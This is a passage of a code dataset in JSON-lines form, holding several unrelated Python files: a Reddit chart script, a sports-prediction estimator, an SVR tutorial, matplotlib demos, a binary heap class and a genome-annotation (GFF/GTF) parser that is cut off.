forcezero=False):\n\t\"\"\"Create postscript vectors of data\n\n\ttitle = Name of the file without extension\n\n\tinputdata = A list of two lists. First list has the x axis labels, second list\n\thas the y axis data. 
x label 14 coresponds to y datum 14, etc.\n\t\"\"\"\n\tprint(' Printing', title)\n\tt=tkinter.Tk()\n\n\tcanvas = tkinter.Canvas(t, width=3840, height=2160, bg=colorbg)\n\tcanvas.pack()\n\tcanvas.create_line(430, 250, 430,1755, width=10, fill=colorfg)\n\t#Y axis\n\tcanvas.create_line(430,1750, 3590,1750, width=10, fill=colorfg)\n\t#X axis\n\n\tdkeys = inputdata[0]\n\tdvals = inputdata[1]\n\tentrycount = len(dkeys)\n\tavailablespace = 3140\n\tavailableheight= 1490\n\tentrywidth = availablespace / entrycount\n\t#print(dkeys, dvals, \"Width:\", entrywidth)\n\n\tsmallest = min(dvals)\n\tbottom = int(smallest*0.75) - 5\n\tbottom = 0 if bottom < 8 else rounded(bottom, 10)\n\tif forcezero:\n\t\tbottom = 0\n\tlargest = max(dvals)\n\ttop = int(largest + (largest/5))\n\ttop = rounded(top, 10)\n\tprint(bottom,top)\n\tspan = top-bottom\n\tperpixel = span/availableheight\n\n\tcurx = 445\n\tcury = 1735\n\n\tlabelx = 420\n\tlabely = 255\n\t#canvas.create_text(labelx, labely, text=str(top), font=(\"Consolas\", 72), anchor=\"e\")\n\tlabelspan = 130#(1735-255)/10\n\tcanvas.create_text(175, 100, text=\"Subreddits created\", font=(\"Consolas\", 72), anchor=\"w\", fill=colorfg)\n\tfor x in range(12):\n\t\tvalue = int(top -((labely - 245) * perpixel))\n\t\tvalue = rounded(value, 10)\n\t\tvalue = '{0:,}'.format(value)\n\t\tcanvas.create_text(labelx, labely, text=value, font=(\"Consolas\", 72), anchor=\"e\", fill=colorfg)\n\t\tcanvas.create_line(430, labely, 3590, labely, width=2, fill=colormid)\n\t\tlabely += labelspan\n\n\tfor entrypos in range(entrycount):\n\t\tentry = dkeys[entrypos]\n\t\tentryvalue = dvals[entrypos]\n\t\tentryx0 = curx + 10\n\t\tentryx1 = entryx0 + (entrywidth-10)\n\t\tcurx += entrywidth\n\n\t\tentryy0 = cury\n\t\tentryy1 = entryvalue - bottom\n\t\tentryy1 = entryy1/perpixel\n\t\t#entryy1 -= bottom\n\t\t#entryy1 /= perpixel\n\t\tentryy1 = entryy0 - entryy1\n\t\t#print(perpixel, entryy1)\n\t\t#print(entry, entryx0,entryy0, entryx1, entryy1)\n\t\tcanvas.create_rectangle(entryx0,entryy0, entryx1,entryy1, fill=colorfg, outline=colorfg)\n\n\t\tfont0x = entryx0 + (entrywidth / 2)\n\t\tfont0y = entryy1 - 5\n\n\t\tfont1y = 1760\n\n\t\tentryvalue = round(entryvalue)\n\t\tfontsize0 = len(str(entryvalue)) \n\t\tfontsize0 = round(entrywidth / fontsize0) + 3\n\t\tfontsize0 = 100 if fontsize0 > 100 else fontsize0\n\t\tfontsize1 = len(str(entry))\n\t\tfontsize1 = round(1.5* entrywidth / fontsize1) + 5\n\t\tfontsize1 = 60 if fontsize1 > 60 else fontsize1\n\t\tcanvas.create_text(font0x, font0y, text=entryvalue, font=(\"Consolas\", fontsize0), anchor=\"s\", fill=colorfg)\n\t\tcanvas.create_text(font0x, font1y, text=entry, font=(\"Consolas\", fontsize1), anchor=\"n\", fill=colorfg)\n\t\tcanvas.update()\n\tprint(' Done')\n\tcanvas.postscript(file='spooky\\\\' +title+\".ps\", width=3840, height=2160)\n\tt.geometry(\"1x1+1+1\")\n\tt.update()\n\tt.destroy()\n\ndef completesweep(shuffle=False, sleepy=0, query=None):\n\tif shuffle is True:\n\t\tcur2.execute('SELECT idstr FROM subreddits WHERE created > 0 ORDER BY RANDOM()')\n\telif query is None:\n\t\tcur2.execute('SELECT idstr FROM subreddits WHERE created > 0')\n\telif query == 'subscribers':\n\t\tcur2.execute('SELECT idstr FROM subreddits WHERE created > 0 ORDER BY subscribers DESC')\n\telse:\n\t\tcur2.execute(query)\n\n\ttry:\n\t\twhile True:\n\t\t\thundred = [cur2.fetchone() for x in range(100)]\n\t\t\twhile None in hundred:\n\t\t\t\thundred.remove(None)\n\t\t\tif len(hundred) == 0:\n\t\t\t\tbreak\n\t\t\t# h[0] because the selection query calls for 
idstr\n\t\t\t# This is not a mistake\n\t\t\thundred = [h[0] for h in hundred]\n\t\t\tprocessmega(hundred, nosave=True)\n\t\t\ttime.sleep(sleepy)\n\texcept KeyboardInterrupt:\n\t\tsql.commit()\n\texcept Exception:\n\t\tsql.commit()\n\tsql.commit()\n\ndef get_newest_sub():\n\tbrandnewest = list(r.get_new_subreddits(limit=1))[0]\n\treturn brandnewest.id","sub_path":"SubredditBirthdays/sb.py","file_name":"sb.py","file_ext":"py","file_size_in_byte":26084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"591674499","text":"from data_sources import set_load_cached\nfrom sklearn.preprocessing import StandardScaler\nfrom utils.algo_tuner import find_best_algorithms\nfrom utils.features.last_x_h2h_feature import get_last_x_h2h_feature\nfrom utils.features.last_x_h2h_in_ground_feature import get_last_x_h2h_in_ground_feature\nfrom utils.features.season_weighted_last_x_h2h_feature import get_season_weighted_last_x_h2h_feature\nfrom utils.features.last_x_matches_form_feature import get_last_x_matches_form_feature\nfrom utils.features.margin_weighted_last_x_h2h_feature import get_margin_weighted_last_x_h2h_feature\nfrom utils.features.last_x_matches_dominance_feature import get_last_x_matches_dominance_feature\nfrom utils.features.this_season_form_feature import get_this_season_matches_form_feature\nfrom utils.features.this_season_h2h_feature import get_this_season_h2h_feature\n\nset_load_cached(False)\n\nfrom data_sources import data_store\n\n__year__ = 2019\n\nmin_window_size = 5\n\n\ndef estimate(transform_scaler=True, min_season_to_train=2015, window_size=min_window_size):\n print('Load data')\n match_results, next_week_frame = data_store.get_cleaned_data()\n\n match_results['f_home_ground_adv'] = match_results['f_home_ground_adv'].apply(lambda x: 1.0 if x else 0.0)\n match_results['f_away_ground_adv'] = match_results['f_away_ground_adv'].apply(lambda x: 1.0 if x else 0.0)\n\n # Features START ---------------------------------------------------------------------------------------------------\n last_5_encounter_feature, encounter_5_matrix = get_last_x_h2h_feature(match_results, window_size)\n last_5_encounter_ground_feature, encounter_5_ground_matrix = get_last_x_h2h_in_ground_feature(match_results,\n window_size)\n season_based_last_5_encounter_feature, season_based_encounter_5_matrix = \\\n get_season_weighted_last_x_h2h_feature(match_results, window_size)\n\n last_5_match_form_feature, last_5_match_from_frame = get_last_x_matches_form_feature(match_results, window_size)\n\n last_5_matches_h2h_dominance_feature, last_5_h2h_match_dominance_frame = \\\n get_margin_weighted_last_x_h2h_feature(match_results, window_size)\n\n last_5_matches_dominance_feature, last_5_match_dominance_frame = \\\n get_last_x_matches_dominance_feature(match_results, window_size)\n\n this_season_form_feature, this_season_form_frame = get_this_season_matches_form_feature(match_results, 2021)\n\n this_season_encounter_feature, this_season_encounter_matrix = get_this_season_h2h_feature(match_results, 2021)\n\n # Features END -----------------------------------------------------------------------------------------------------\n\n match_results = match_results.merge(last_5_encounter_feature, on=\"game\")\n match_results = match_results.merge(last_5_encounter_ground_feature, on=\"game\")\n match_results = match_results.merge(season_based_last_5_encounter_feature, on=\"game\")\n match_results = match_results.merge(last_5_match_form_feature, on=\"game\", how=\"left\")\n 
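# NOTE (added comment): the remaining merges use how='left' so early-season games with no prior history survive the join; the this-season columns are filled with 0.0 below.\n    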
match_results = match_results.merge(last_5_matches_h2h_dominance_feature, on=\"game\", how=\"left\")\n match_results = match_results.merge(last_5_matches_dominance_feature, on=\"game\", how=\"left\")\n match_results = match_results.merge(this_season_form_feature, on=\"game\", how=\"left\")\n match_results = match_results.merge(this_season_encounter_feature, on=\"game\", how=\"left\")\n\n # Fill Sub Calc nulls END ------------------------------------------------------------------------------------------\n match_results['f_this_season_home_form'] = match_results['f_this_season_home_form'].fillna(0.0)\n match_results['f_this_season_away_form'] = match_results['f_this_season_away_form'].fillna(0.0)\n match_results['f_this_season_h2h'] = match_results['f_this_season_h2h'].fillna(0.0)\n\n # Features Concat END ----------------------------------------------------------------------------------------------\n\n train_df = match_results[match_results.season == __year__]\n feature_cols = ['f_away_team_id', 'f_home_team_id', 'f_ground_id', 'f_home_odds', 'f_away_odds',\n 'f_home_ground_adv', 'f_away_ground_adv']\n\n calculated_stats = [f'f_last_{window_size}_h2h', f'f_last_{window_size}_h2h_in_ground',\n f'f_last_{window_size}_away_form', f'f_last_{window_size}_home_form',\n f'f_margin_weighted_last_{window_size}_h2h', f'f_last_{window_size}_home_dominance',\n f'f_last_{window_size}_away_dominance',\n 'f_this_season_home_form', 'f_this_season_away_form',\n 'f_this_season_h2h']\n\n feature_cols.extend(calculated_stats)\n\n feature_cols_original = feature_cols.copy()\n feature_cols.extend(['game'])\n\n # Create our train set\n X = match_results[match_results.season > min_season_to_train][feature_cols]\n Y = match_results.loc[match_results.season > min_season_to_train, 'result']\n\n if transform_scaler:\n scaler = StandardScaler()\n X[feature_cols_original] = scaler.fit_transform(X[feature_cols_original])\n\n print('Find the best algo')\n algorithm_perf = find_best_algorithms(X, Y, kf_splits=5)\n print(algorithm_perf.to_string())\n\n chosen_algorithms = algorithm_perf.loc[algorithm_perf['Mean Log Loss'] < 0.67]\n\n print(\"\\nWith 'Mean Log Loss' < 2/3\\n\", \"---------------------------------\\n\", chosen_algorithms.to_string())\n\n\n# Execute Estimation ---------------------------------------------------------------------------------------------------\nestimate(transform_scaler=True, min_season_to_train=2015, window_size=5)\n","sub_path":"estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"423438878","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 25 16:56:54 2018\n\n@author: neetu\n\"\"\"\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Position_Salaries.csv')\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, -1].values\n\n# Splitting the dataset into the Training set and Test set\n\"\"\"from sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\"\"\"\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nsc_y = StandardScaler()\nX = sc_X.fit_transform(X)\n#convert into Column Vector\ny = sc_y.fit_transform(y.reshape(-1, 1))\n\n#Fitting the Regression Model to the dataset\n#Create Regressor here\nfrom sklearn.svm import 
SVR\nregressor = SVR(kernel = 'rbf')\n#Reverse back to 1D array\ny = y.ravel()\nregressor.fit(X, y)\n\n#Predicting a new result with Linear Regressor\ny_pred = regressor.predict(sc_X.transform(np.array([[6.5]])))\ny_pred = sc_y.inverse_transform(y_pred)\n\n#Visuaising Polynomial Regression results (for higher resolution and smother curve\n#X_grid = np.arange(min(X), max(X), 0.1)\n#X_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, color = 'red')\nplt.plot(X, regressor.predict(X), color='blue')\nplt.title('Level vs Salary (SVR)')\nplt.xlabel('Level')\nplt.ylabel('Salary')\nplt.show()\n","sub_path":"Part 2 - Regression/Support Vector Regression (SVR)/svr_[Neetu].py","file_name":"svr_[Neetu].py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"218431168","text":"import datetime\nimport json\n\nname = 'server_log.txt'\n\n\ndef prepare_logfile():\n a = open(name, 'w')\n a.close()\n log(\"server log file {name} prepared.\".format(name=name), fd=False)\n\n\ndef log(to_log, fd=True):\n string_to_log = '[{timestamp}] {data}'.format(timestamp=datetime.datetime.now(), data=to_log)\n print(string_to_log)\n if fd:\n with open(name, 'a') as log_file_descriptor:\n print(string_to_log, file=log_file_descriptor)\n\n\ndef json_reader(json_path):\n with open(json_path, 'r') as fd:\n json_data = fd.read()\n json_config = json.loads(json_data)\n return json_config\n","sub_path":"StorageApp/logging_and_configuration.py","file_name":"logging_and_configuration.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"405920951","text":"#!/usr/bin/env python3\n#\n# Ryan Lamb\n# CPSC 223P-03\n#2020-10-22\n#rclamb27@csu.fullerton.edu\n\n# Examples taken from various gallery items at\n# https://matplotlib.org/gallery\n\"\"\"Matplotlib demo program changing color and lines and copying files in to the demo program\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.dates as mdates\nfrom datetime import datetime\nfrom time import sleep\n\ndef fill_between_demo():\n \"\"\"outputs 3 graphs as files and puts them into pdfs\"\"\"\n # https://matplotlib.org/3.1.0/gallery/lines_bars_and_markers/fill_between_demo.html\n # fill_between_demo.py\n x = np.arange(0.0, 2, 0.01)\n y1 = np.sin(2 * np.pi * x)\n y2 = 1.2 * np.sin(4 * np.pi * x)\n\n ###############################################################################\n fig, (ax1, ax2, ax3) = plt.subplots(3, 1, sharex=True)\n\n ax1.fill_between(x, 0, y1)\n ax1.set_ylabel('between y1 and 0')\n\n ax2.fill_between(x, y1, 1)\n ax2.set_ylabel('between y1 and 1')\n\n ax3.fill_between(x, y1, y2)\n ax3.set_ylabel('between y1 and y2')\n ax3.set_xlabel('x')\n fig.savefig(\"a.pdf\")\n ###############################################################################\n # Now fill between y1 and y2 where a logical condition is met. 
Note\n # this is different than calling\n # ``fill_between(x[where], y1[where], y2[where] ...)``\n # because of edge effects over multiple contiguous regions.\n\n fig, (ax, ax1) = plt.subplots(2, 1, sharex=True)\n ax.plot(x, y1, x, y2, color='black')\n ax.fill_between(x, y1, y2, where=y2 >= y1, facecolor='green', interpolate=True)\n ax.fill_between(x, y1, y2, where=y2 <= y1, facecolor='red', interpolate=True)\n ax.set_title('fill between where')\n\n # Test support for masked arrays.\n y2 = np.ma.masked_greater(y2, 1.0)\n ax1.plot(x, y1, x, y2, color='black')\n ax1.fill_between(x, y1, y2, where=y2 >= y1,\n facecolor='green', interpolate=True)\n ax1.fill_between(x, y1, y2, where=y2 <= y1,\n facecolor='red', interpolate=True)\n ax1.set_title('Now regions with y2>1 are masked')\n fig.savefig(\"b.pdf\")\n ###############################################################################\n # This example illustrates a problem; because of the data\n # gridding, there are undesired unfilled triangles at the crossover\n # points. A brute-force solution would be to interpolate all\n # arrays to a very fine grid before plotting.\n\n\n ###############################################################################\n # Use transforms to create axes spans where a certain condition is satisfied:\n\n fig, ax = plt.subplots()\n y = np.sin(4 * np.pi * x)\n ax.plot(x, y, color='black')\n\n # use data coordinates for the x-axis and the axes coordinates for the y-axis\n import matplotlib.transforms as mtransforms\n trans = mtransforms.blended_transform_factory(ax.transData, ax.transAxes)\n theta = 0.9\n ax.axhline(theta, color='green', lw=2, alpha=0.5)\n ax.axhline(-theta, color='red', lw=2, alpha=0.5)\n ax.fill_between(x, 0, 1, where=y > theta,\n facecolor='green', alpha=0.5, transform=trans)\n ax.fill_between(x, 0, 1, where=y < -theta,\n facecolor='red', alpha=0.5, transform=trans)\n fig.savefig(\"c.pdf\")\n\n plt.show()\n\ndef simple_plot():\n \"\"\"creates a simple graph with a colored line\"\"\"\n # https://matplotlib.org/3.1.0/gallery/lines_bars_and_markers/simple_plot.html#sphx-glr-gallery-lines-bars-and-markers-simple-plot-py\n # Data for plotting\n # Modified to write only to a file and close the figure.\n t = np.arange(0.0, 2.0, 0.01)\n s = 1 + np.sin(2 * np.pi * t)\n\n\n fig, ax = plt.subplots()\n ax.plot(t, s, color= \"green\")\n\n ax.set(xlabel='time (s)', ylabel='voltage (mV)',\n title='About as simple as it gets, folks')\n ax.grid()\n print('Writing out figure to simple_plot.png')\n fig.savefig(\"simple_plot.png\")\n plt.close()\n\ndef timeline():\n \"\"\"creates a timeline graph\"\"\"\n # https://matplotlib.org/gallery/lines_bars_and_markers/timeline.html#sphx-glr-gallery-lines-bars-and-markers-timeline-py\n # Modified to write only to a file and close the figure.\n\n names = ['v2.2.4', 'v3.0.3', 'v3.0.2', 'v3.0.1', 'v3.0.0', 'v2.2.3',\n 'v2.2.2', 'v2.2.1', 'v2.2.0', 'v2.1.2', 'v2.1.1', 'v2.1.0',\n 'v2.0.2', 'v2.0.1', 'v2.0.0', 'v1.5.3', 'v1.5.2', 'v1.5.1',\n 'v1.5.0', 'v1.4.3', 'v1.4.2', 'v1.4.1', 'v1.4.0']\n\n dates = ['2019-02-26', '2019-02-26', '2018-11-10', '2018-11-10',\n '2018-09-18', '2018-08-10', '2018-03-17', '2018-03-16',\n '2018-03-06', '2018-01-18', '2017-12-10', '2017-10-07',\n '2017-05-10', '2017-05-02', '2017-01-17', '2016-09-09',\n '2016-07-03', '2016-01-10', '2015-10-29', '2015-02-16',\n '2014-10-26', '2014-10-18', '2014-08-26']\n\n # Convert date strings (e.g. 
2014-10-18) to datetime\n dates = [datetime.strptime(d, \"%Y-%m-%d\") for d in dates]\n levels = np.tile([-5, 5, -3, 3, -1, 1],\n int(np.ceil(len(dates)/6)))[:len(dates)]\n\n # Create figure and plot a stem plot with the date\n fig, ax = plt.subplots(figsize=(8.8, 4), constrained_layout=True)\n ax.set(title=\"Matplotlib release dates\")\n\n ax.vlines(dates, 0, levels, color=\"tab:red\") # The vertical stems.\n ax.plot(dates, np.zeros_like(dates), \"-o\",\n color=\"k\", markerfacecolor=\"w\") # Baseline and markers on it.\n\n # annotate lines\n for d, l, r in zip(dates, levels, names):\n ax.annotate(r, xy=(d, l),\n xytext=(-3, np.sign(l)*3), textcoords=\"offset points\",\n horizontalalignment=\"right\",\n verticalalignment=\"bottom\" if l > 0 else \"top\")\n\n # format xaxis with 4 month intervals\n ax.get_xaxis().set_major_locator(mdates.MonthLocator(interval=4))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter(\"%b %Y\"))\n plt.setp(ax.get_xticklabels(), rotation=30, ha=\"right\")\n\n # remove y axis and spines\n ax.get_yaxis().set_visible(False)\n for spine in [\"left\", \"top\", \"right\"]:\n ax.spines[spine].set_visible(False)\n\n ax.margins(y=0.1)\n print('Writing out figure to timeline.png')\n fig.savefig(\"timeline.png\")\n plt.close()\n\ndef line_demo_dash_control():\n \"\"\"creats a graph with customizable dashed lines\"\"\"\n # https://matplotlib.org/gallery/lines_bars_and_markers/line_demo_dash_control.html#sphx-glr-gallery-lines-bars-and-markers-line-demo-dash-control-py\n # Modified to write only to a file and close the figure.\n \"\"\"\n ==============================\n Customizing dashed line styles\n ==============================\n\n The dashing of a line is controlled via a dash sequence. It can be modified\n using `.Line2D.set_dashes`.\n\n The dash sequence is a series of on/off lengths in points, e.g.\n ``[3, 1]`` would be 3pt long lines separated by 1pt spaces.\n\n Some functions like `.Axes.plot` support passing Line properties as keyword\n arguments. In such a case, you can already set the dashing when creating the\n line.\n\n *Note*: The dash style can also be configured via a\n :doc:`property_cycle `\n by passing a list of dash sequences using the keyword *dashes* to the\n cycler. This is not shown within this example.\n \"\"\"\n import numpy as np\n import matplotlib.pyplot as plt\n\n x = np.linspace(0, 10, 500)\n y = np.sin(x)\n\n fig, ax = plt.subplots()\n\n # Using set_dashes() to modify dashing of an existing line\n line1, = ax.plot(x, y, label='Using set_dashes()')\n line1.set_dashes([3, 4, 5, 1]) # 2pt line, 2pt break, 10pt line, 2pt break\n\n # Using plot(..., dashes=...) 
to set the dashing when creating a line\n line2, = ax.plot(x, y + 3, dashes=[4, 3], label='Using the dashes parameter')\n\n ax.legend()\n print('Writing out figure to line_demo_dash_control.png')\n fig.savefig(\"line_demo_dash_control.png\")\n plt.close()\n\ndef main():\n \"\"\"Main function\"\"\"\n simple_plot()\n line_demo_dash_control()\n timeline()\n fill_between_demo()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"part-1/matplotlib_demo.py","file_name":"matplotlib_demo.py","file_ext":"py","file_size_in_byte":8204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575627312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport numpy as np\nPATH = 'abbildungen/'\nname = 'lmn_simple_interp'\n\ndef plot(data, res, err, info, figsize):\n import matplotlib.pyplot as plt\n from plottools import label_line, MARKER_DICT, L_WIDTH\n from plot import PlotterLLM\n from matplotlib.colors import Normalize\n import matplotlib.patches as patches\n import matplotlib.lines as mlines\n\n marker_dict = MARKER_DICT\n marker_dict.pop('color')\n l_width = L_WIDTH\n \n X_train, y_train, phi, phidot, X_test, P_pred = data\n X_pred = err[1]\n \n fig, axes = plt.subplots(1, 1, figsize=figsize)#, sharex=True, sharey=True)\n \n ax2 = axes\n bounds = np.array(list(zip(np.min(X_train, axis=0).tolist(), np.max(X_train, axis=0).tolist()))).tolist()\n X_err = np.sqrt(np.sum((np.rad2deg(X_test) - np.rad2deg(X_pred[:, [0, 2]]))**2, axis=1))\n X_err = np.clip(X_err, 0.0, 30)\n k = 50\n \n im = ax2.imshow(X_err.reshape((k, k)), extent=[*np.rad2deg(bounds[0]), *np.rad2deg(bounds[2])], aspect='equal',\n origin='lower', interpolation='gaussian', cmap='magma_r')\n xlim = ax2.get_xlim()\n ylim = ax2.get_ylim()\n ax2.plot(*np.rad2deg(X_train[:,[0,2]]).T, color='C7', **marker_dict, alpha=0.5)\n ax2.set_xlabel(r\"$\\varphi$ in $\\circ$\")\n ax2.set_ylabel(r\"$\\dot{\\varphi}$ in $\\nicefrac{\\circ}{\\text{s}}$\")\n fig.colorbar(im, label=\"RMSE in a.u.\", ax=ax2)\n\n ax2.set_xlim(xlim)\n ax2.set_ylim(ylim)\n \n \n plt.tight_layout()\n \nif __name__ == \"__main__\":\n import matplotlib as mpl\n mpl.use('pgf')\n import matplotlib.pyplot as plt\n from plottools import figsize, get_colors, MPL_OPTIONS\n \n plt.style.use('default')\n mpl.rcParams.update(MPL_OPTIONS)\n \n plot(*np.load(PATH + 'lmn_simple.npy'), figsize=figsize(0.65, ratio=1))\n plt.savefig(PATH + name + '.pgf')","sub_path":"abbildungen/lmn_simple_interp.py","file_name":"lmn_simple_interp.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"25886523","text":"# An implementation of a max-binary heap using an array\n\nimport math\n\nclass BinaryHeap:\n \n # The init function serves as a build heap replacement\n def __init__(self, list):\n self.array = []\n # We will have a null node at index 0 to simplify calculations\n self.array.append(None)\n for i in range (len(list)):\n self.array.append(list[i])\n firstLeaf = pow(2,math.floor(math.log(len(list),2)))\n firstParent = firstLeaf - 1\n for i in reversed(range(1, firstLeaf)):\n self.max_heapify(i) \n return\n \n def insert(self, nodeToInsert):\n self.array.append(nodeToInsert)\n childNodeIndex = len(self.array)-1\n parentNodeIndex = math.floor(childNodeIndex/2)\n while(parentNodeIndex >= 1 and self.array[parentNodeIndex] < nodeToInsert):\n temp = self.array[childNodeIndex]\n self.array[childNodeIndex] = self.array[parentNodeIndex]\n 
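# sift-up (added comment): finish the swap with the saved value, then climb one level toward the root\n            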
self.array[parentNodeIndex] = temp\n            childNodeIndex = parentNodeIndex\n            parentNodeIndex = math.floor(parentNodeIndex/2)\n    \n    def remove(self):\n        if len(self.array) < 2:\n            return None\n        temp = self.array[1]\n        last = self.array.pop()\n        if len(self.array) > 1:\n            # move the last element to the root and restore the heap property\n            self.array[1] = last\n            self.max_heapify(1)\n        return temp\n    \n    def max(self):\n        if len(self.array) < 2:\n            return None\n        return self.array[1]\n    \n    # Assumes that the two subtrees at left child and right child are max heaps\n    def max_heapify(self, nodeIndex):\n        leftNodeIndex = 2*nodeIndex\n        rightNodeIndex = 2*nodeIndex+1\n        leftNodeExists = self.checkNodeExists(leftNodeIndex)\n        rightNodeExists = self.checkNodeExists(rightNodeIndex)\n        if not leftNodeExists and not rightNodeExists:\n            # No Children\n            return\n        swapped = False\n        greaterChild = -1\n        if leftNodeExists and not rightNodeExists:\n            # Only left child\n            greaterChild = leftNodeIndex\n            swapped = self.swapChildIfGreater(leftNodeIndex, nodeIndex)\n        if not leftNodeExists and rightNodeExists:\n            # Only right child\n            greaterChild = rightNodeIndex\n            swapped = self.swapChildIfGreater(rightNodeIndex, nodeIndex)\n        if leftNodeExists and rightNodeExists:\n            # Both children, check which is greater\n            if self.array[leftNodeIndex] > self.array[rightNodeIndex]:\n                greaterChild = leftNodeIndex\n            else:\n                greaterChild = rightNodeIndex\n            swapped = self.swapChildIfGreater(greaterChild, nodeIndex)\n        if swapped is True:\n            # the child that moved up may now violate the heap property below\n            self.max_heapify(greaterChild)\n        return\n    \n    def checkNodeExists(self, nodeIndex):\n        if nodeIndex >= len(self.array):\n            return False\n        if self.array[nodeIndex] is None:\n            return False\n        return True\n    \n    def swapChildIfGreater(self, childNodeIndex, parentNodeIndex):\n        if self.array[childNodeIndex] > self.array[parentNodeIndex]:\n            temp = self.array[parentNodeIndex]\n            self.array[parentNodeIndex] = self.array[childNodeIndex]\n            self.array[childNodeIndex] = temp\n            return True\n        else:\n            return False\n    \n    # Returns true if the binary tree is a max heap \n    def checkMaxHeapProperty(self, nodeIndex):\n        leftNodeIndex = 2*nodeIndex\n        rightNodeIndex = 2*nodeIndex+1\n        leftTreeChecked = True\n        rightTreeChecked = True\n        if leftNodeIndex < len(self.array) and self.array[leftNodeIndex] is not None:\n            leftTreeChecked = self.checkMaxHeapProperty(leftNodeIndex)\n        if rightNodeIndex < len(self.array) and self.array[rightNodeIndex] is not None:\n            rightTreeChecked = self.checkMaxHeapProperty(rightNodeIndex)\n        if rightTreeChecked and leftTreeChecked:\n            return True\n        else:\n            return False    \n    ","sub_path":"Data_Structures/BinaryHeap/src/BinaryHeap.py","file_name":"BinaryHeap.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"48003041","text":"\n\nclass GFFParser:\n    def __init__(self):\n        self.features=[]\n\n    def GetParentFeature(self,feat):\n        parentid=feat['parentid']\n        if len(parentid)==0:\n            return None\n        key=feat['seqid']+parentid\n        if not(key in self.featindex):\n            return None\n        idx=self.featindex[key]\n        #print(idx)\n        return self.features[idx]\n\n    def parseGTF(self,filelist):\n        #read the feature list\n        self.features=[]\n        self.featindex={}\n        for filename in filelist:\n            print('processing file '+filename)\n            f=open(filename,'r')\n            for line in f.readlines():\n#                if len(self.features)>20000: break#!!!\n                line=line.rstrip('\\n')\n                if line[0]!='#':\n                    parts=line.split('\\t')\n                    feattype=parts[2]\n                    if (feattype=='CDS') or (feattype=='exon'):\n                        if len(self.features)%1000==0: print('read: '+str(len(self.features)))\n                        feat={}\n                        feat['nr']=len(self.features)\n                        feat['children']=[]\n                        feat['seqid']='chr'+parts[0]\n                        feat['type']=feattype\n                        
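# Added note: GTF is tab-separated; parts[3] and parts[4] hold the 1-based, inclusive start/end coordinates\n                        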
feat['start']=int(parts[3])\n feat['end']=int(parts[4])\n attribs=parts[8].split(';')\n feat['id']=''\n feat['parentid']=''\n feat['name']=''\n for attribstr in attribs:\n attribstr=attribstr.lstrip()\n attribstr=attribstr.rstrip()\n # prt=attribstr.partition(' \"')\n key,sp,value=attribstr.partition(' \"')\n value=value[:-1]\n if feattype=='CDS':\n if key=='gene_id': feat['id']=value\n if key=='gene_name': feat['name']=value\n feat['type']='gene'\n else:\n if key=='gene_id': feat['parentid']=value\n self.features.append(feat)\n f.close()\n\n def parseGFF(self,filelist):\n #read the feature list\n self.features=[]\n for filename in filelist:\n print('processing file '+filename)\n f=open(filename,'r')\n header=f.readline().rstrip('\\n')\n if header!='##gff-version 3':\n raise Exception('Invalid GFF file')\n for line in f.readlines():\n line=line.rstrip('\\n')\n if line=='##FASTA':\n break\n if line[0]!='#':\n parts=line.split('\\t')\n feat={}\n feat['children']=[]\n feat['seqid']=parts[0]\n feat['type']=parts[2]\n feat['start']=int(parts[3])\n feat['end']=int(parts[4])\n attribs=parts[8].split(';')\n feat['id']=''\n feat['parentid']=''\n feat['name']=''\n for attribstr in attribs:\n if '=' in attribstr:\n key,value=attribstr.split('=')\n if key=='ID': feat['id']=value\n if key=='Parent': feat['parentid']=value\n if key=='Name': feat['name']=value\n self.features.append(feat)\n f.close()\n\n def Process(self):\n\n #remove duplicates\n print('removing duplicates')\n dind={}\n featnr=0\n while featnrfeat['start']:\n print('Left extending {0} from {1} to {2}'.format(parentfeat['id'],parentfeat['start'],feat['start']))\n parentfeat['start']=feat['start']\n\n\n\n #collect children of each feature\n for feat in self.features:\n myfeat=feat\n while self.GetParentFeature(myfeat)!=None:\n myparent=self.GetParentFeature(myfeat)\n myparent['children'].append(feat)\n myfeat=myparent\n myparent=self.GetParentFeature(feat)\n\n\n def save(self,filename):\n print('saving')\n f=open(filename,'w')\n for feat in self.features:\n if (feat['type']=='gene'):\n f.write(feat['seqid']+'\\t')\n f.write(str(feat['start'])+'\\t')\n f.write(str(feat['end'])+'\\t')\n f.write(feat['id']+'\\t')\n f.write(''+'\\t')\n f.write(feat['type']+'\\t')\n f.write(feat['name'])\n f.write('\\n')\n for child in feat['children']:\n if child['type']=='exon':\n f.write(child['seqid']+'\\t')\n f.write(str(child['start'])+'\\t')\n f.write(str(child['end'])+'\\t')\n f.write(child['id']+'\\t')\n f.write(feat['id']+'\\t')\n f.write(child['type']+'\\t')\n f.write(child['name'])\n f.write('\\n')\n f.close()\n\n\n\n#chromlist=range(1,15)\n#basepath=\"C:/Data/Genomes/Plasmodium\"\n#filelist=['{0}/Pf3D7_{1}.gff'.format(basepath,str(nr).zfill(2)) for nr in 